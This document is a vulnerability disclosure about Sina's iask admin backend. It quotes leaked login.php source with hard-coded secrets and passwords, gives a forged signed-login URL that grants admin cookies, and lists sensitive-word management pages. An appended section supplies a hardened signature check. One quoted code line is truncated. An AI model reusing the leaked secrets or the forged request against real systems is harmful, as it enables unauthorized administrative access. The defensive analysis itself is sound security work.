A high-risk design flaw in the Sina integrated management backend allows management permissions to be obtained (permission control required)
As in the title.
Permission over the sensitive-word library. Why did Weibo spread the advertisement?
Source:
http://admin.iask.sina.com.cn/.svn/entries information leakage vulnerability (now fixed)
Reading the leaked source code reveals a place where a login can be forged.
The source code for /api/login.php is as follows:
ini_set('session.cookie_domain', ".iask.sina.com.cn");
error_reporting(E_ALL);
ini_set('display_errors', 1);
define('COOKIE_DOMAIN', '.admin.iask.sina.com.cn');
include('/data4/adminManage/conf/adminconf.php');
session_start();

// Per-app signing secrets, hard-coded in the source
$appmap = array(
    1000 => 'd420915821e92b6559478b446445d172',
    1001 => 'hangzhou',
);
// Backend account each app is logged in as, also hard-coded
$appuser = array(
    1000 => array('user' => 'weibo_zhishi', 'PW' => '123'),
    1001 => array('user' => 'Baby_zhishi', 'PW' => '000000'),
);
$appto = array(
    123456 => 'http://admin.iask.sina.com.cn/audit/ishare_audit.php?action=indexapp',
    1001 => 'http://admin.iask.sina.com.cn/audit/ishare_audit.php?action=indexapp',
);
$appgroup = array(
    1000 => array(7, 8, 10),
    1001 => array(16),
);

$appid = isset($_GET['appid']) ? intval($_GET['appid']) : 0;
$sign = isset($_GET['sign']) ? $_GET['sign'] : '';
$time = isset($_GET['time']) ? intval($_GET['time']) : 0;
$ip = isset($_GET['ip']) ? $_GET['ip'] : '';
$user = isset($_GET['user']) ? $_GET['user'] : '';

// The following check can be passed simply by supplying the parameters; appid uses 1000
if (!$appid || !$sign || !$time || !$ip || !$user || !isset($appmap[$appid]) || !isset($appuser[$appid])) {
    exit('000000');
}

// time() check. The exit at the bottom is commented out --!
if ($time
    // exit('200');
}

$rip = lip::get_real_ip();
// Commented out --!
if ($rip != $ip) {
    // exit('20140901');
}
error_log($rip . '-' . $ip . "\n", 3, '/tmp/apip.log');

// Here you can forge it yourself ~~~ 222333 ~~~
$sign_me = substr(md5($appid . $user . $time . $ip . $appmap[$appid]), 3, 16);
if ($sign_me != $sign) {
    exit('20140901');
}

$username = $appuser[$appid];
global $db_admin;
$userDB = new admin_userDB($db_admin);
$rs = $userDB->check_password($appuser[$appid]['user'], $appuser[$appid]['PW'], true);

// The cookie fields are set here; once they are set, you are logged in
if (is_array($rs)) {
    set_cookie("userid", $rs['uid']);
    set_cookie("username", $rs['uname']);
    set_cookie("name", 'supe');
    set_cookie("gname", $rs['gname']);
    set_cookie("gid", $rs['gid']);
    set_cookie("menuids_admin", $rs['menuid']);
    if (!$_COOKIE['lastlogintime']) {
        $_COOKIE['lastlogintime'] = date('Y-m-d H:i:s');
        set_cookie("lastlogintime", $_COOKIE['lastlogintime']);
    }
} else {
    exit('20140901');
}

$_SESSION['audit']['app']['username'] = $user;
$_SESSION['audit']['app']['group'] = $appgroup[$appid];
$result = 1000;
if (isset($_GET['location']) && $_GET['location'] == 1) {
    $result = "<script>window.location.href='{$appto[$appid]}'</script>";
}
exit("$result");

function set_cookie($cname, $cval)
{
    setcookie($cname, $cval, 0, "/", COOKIE_DOMAIN);
}
Verification:
http://admin.iask.sina.com.cn/api/login.php?appid=1000&sign=13f069bbd9f3ab16&time=1554091094&ip=8.8.8.8&user=weibo_zhishi
Check that the cookie is successfully set:
http://admin.iask.sina.com.cn/api/print.php
http://admin.iask.sina.com.cn/filter/set_sensitive_vocabulary.php?type=%C8%AB%B2%BF&level=%C8%AB%B2%BF&own=&word=&Submit=%B2%E9%D5%D2
Modify and delete operations:
What are these keywords? It should be the sensitive-word dictionary! It can also be updated ~~ 222333
http://admin.iask.sina.com.cn/filter/control_set_for_ishare_content.php
http://admin.iask.sina.com.cn/filter/ishare_title_red.php
Solution:
Permission Control
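A hardened form of the signed-login check in /api/login.php, as an added example that is not Sina's code or part of the original report. It assumes per-app secrets are supplied through hypothetical APP_SECRET_<appid> environment variables and swaps the truncated md5 for HMAC-SHA256; the function names, MAX_SKEW and the sample values are constructed for illustration.

```php
<?php
// Added example, not the original code. Hypothetical names throughout. Assumption:
// per-app secrets live in APP_SECRET_<appid> env vars, outside the web root and repository.
const MAX_SKEW = 300; // seconds a signed request stays valid

function app_secret(int $appid): ?string
{
    $s = getenv('APP_SECRET_' . $appid);
    return ($s === false || $s === '') ? null : $s;
}

// Length-prefix each field so "ab"."c" and "a"."bc" cannot yield the same message.
function canonical(int $appid, string $user, int $time, string $ip): string
{
    $out = '';
    foreach ([(string)$appid, $user, (string)$time, $ip] as $f) {
        $out .= strlen($f) . ':' . $f;
    }
    return $out;
}

function sign_request(string $secret, int $appid, string $user, int $time, string $ip): string
{
    return hash_hmac('sha256', canonical($appid, $user, $time, $ip), $secret);
}

// Returns null when the request is accepted, otherwise a reason for the audit log.
function verify_request(array $q, string $remoteAddr, int $now): ?string
{
    $appid  = (int)($q['appid'] ?? 0);
    $time   = (int)($q['time'] ?? 0);
    $user   = (string)($q['user'] ?? '');
    $sign   = (string)($q['sign'] ?? '');
    $secret = app_secret($appid);
    if ($secret === null || $user === '' || $sign === '') return 'missing field or unknown app';
    if (abs($now - $time) > MAX_SKEW) return 'stale timestamp'; // enforced, not commented out
    // Bind to the address the server observed, never to a caller-supplied ip parameter.
    $expected = sign_request($secret, $appid, $user, $time, $remoteAddr);
    return hash_equals($expected, $sign) ? null : 'bad signature'; // constant-time compare
}

// Constructed self-check with a throwaway secret and documentation-range addresses.
putenv('APP_SECRET_1000=constructed-test-secret');
$now = 1700000000;
$q = ['appid' => 1000, 'user' => 'demo', 'time' => $now,
      'sign' => sign_request('constructed-test-secret', 1000, 'demo', $now, '192.0.2.10')];
var_dump(verify_request($q, '192.0.2.10', $now));        // matching request
var_dump(verify_request($q, '198.51.100.7', $now));      // same request from another address
var_dump(verify_request($q, '192.0.2.10', $now + 3600)); // replayed an hour later
```

Signature hardening does not replace the fix named above: each page under /filter/ still needs its own permission check, and the .svn directory must not be served by the web server.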